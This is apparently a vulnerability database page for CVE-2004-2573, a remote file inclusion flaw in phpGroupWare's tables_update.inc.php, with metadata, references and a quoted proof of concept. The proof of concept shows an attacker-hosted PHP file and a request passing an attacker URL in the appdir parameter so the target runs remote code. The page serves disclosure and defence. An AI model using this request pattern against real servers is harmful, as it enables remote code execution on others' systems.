PHPGroupWare Tables_Update.Inc.PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107661 漏洞类型 输入验证
发布时间 2004-01-27 更新时间 2006-06-15
CVE编号 CVE-2004-2573 CNNVD-ID CNNVD-200412-162
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-162
|漏洞详情
phpGroupWare0.9.14.005及其早期版本的tables_update.inc.php存在PHP远程文件包含漏洞。远程攻击者可以借助appdir参数的外部URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/12074/info

phpGroupWare is prone to a remote file include vulnerability, potentially allowing the execution of malicious PHP code. This would occur in the context of the affected web server. 

The tables_update.inc.php script contains the following include calls:
/* Include older phpGroupWare update support */
include($appdir . 'tables_update_0_9_9.inc.php');
include($appdir . 'tables_update_0_9_10.inc.php');
include($appdir . 'tables_update_0_9_12.inc.php');

For example supplying the following file:
tables_update_0_9_9.inc.php = <?php print "<?php phpinfo();?>" ;?>

The following request will execute the phpinfo() command on the vulnerable target:

http://[victim]/[phpgroupware_directory]/phpgwapi/setup/tables_update.inc.php?appdir=http://[attacker]/
|参考资料

来源:savannah.gnu.org
链接:https://savannah.gnu.org/bugs/?func=detailitem&item_id=7478
来源:BID
名称:12074
链接:http://www.securityfocus.com/bid/12074
来源:OSVDB
名称:7599
链接:http://www.osvdb.org/7599